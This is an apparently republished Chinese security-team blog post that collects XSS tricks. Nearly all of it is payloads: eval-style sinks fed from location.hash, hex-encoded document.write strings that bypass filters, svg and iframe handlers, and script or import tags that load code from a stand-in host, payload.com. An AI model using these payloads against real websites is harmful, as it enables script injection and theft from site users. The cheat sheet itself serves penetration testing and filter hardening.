香香的xss小记录
Posted ChaMd5安全团队
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了香香的xss小记录相关的知识,希望对你有一定的参考价值。
0x00 前言
总结的一些xss的技巧(可能会持续更新),愿大佬勿喷,还有什么方法,大佬记得分享啊。有什么看不惯的错误请在本文留言,谢谢。
0x01 我认为最短的执行任意js代码
eval(name);
poc:
<iframe src='http://localhost/?xss=eval(name);' name='js-code'>
0x02 类似eval的方法
setTimeout(location.hash.slice(1))
setInterval(location.hash.slice(1))
Function(location.hash.slice(1))(1)
jQuery.globalEval(location.hash.slice(1))
document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`
document.getElementById('xx').innerhtml=`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`
0x03 当括号被过滤执行任意payload的方法
document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`
<svg/onload="location='javascript:/*'%2blocation.hash">
锚点后接*/jscode
0x04 事件被过滤时执行任意payload
<link rel=import href=\\payload.com>
<script src=\\payload.com></script>
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
欢迎各位大牛指点 欢迎各位大牛投稿
关于文章的建议和意见都可以留言告诉我们呢
(撒花)
投稿至:admin@chamd5.org
ChaMd5的小八卦全在这里哟~比心❤
................ChaMd5安全团队................
悄悄的告诉你
关注会有小惊喜
以上是关于香香的xss小记录的主要内容,如果未能解决你的问题,请参考以下文章